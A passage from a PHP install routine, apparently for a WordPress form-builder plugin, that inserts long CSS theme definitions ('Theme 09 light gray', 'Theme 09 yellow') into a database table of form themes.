20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8A8A8A;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8A8A8A;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #070068;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #070068;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #fff;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 09 light gray\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #818181;\r\nmargin-bottom: 10px;\r\ncolor: #818181;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #013D7C;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #013D7C;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #727272;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/01/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 09 yellow\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #E9B500;\r\nmargin-bottom: 10px;\r\ncolor: #E9B500;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #E9B500 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 1540px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	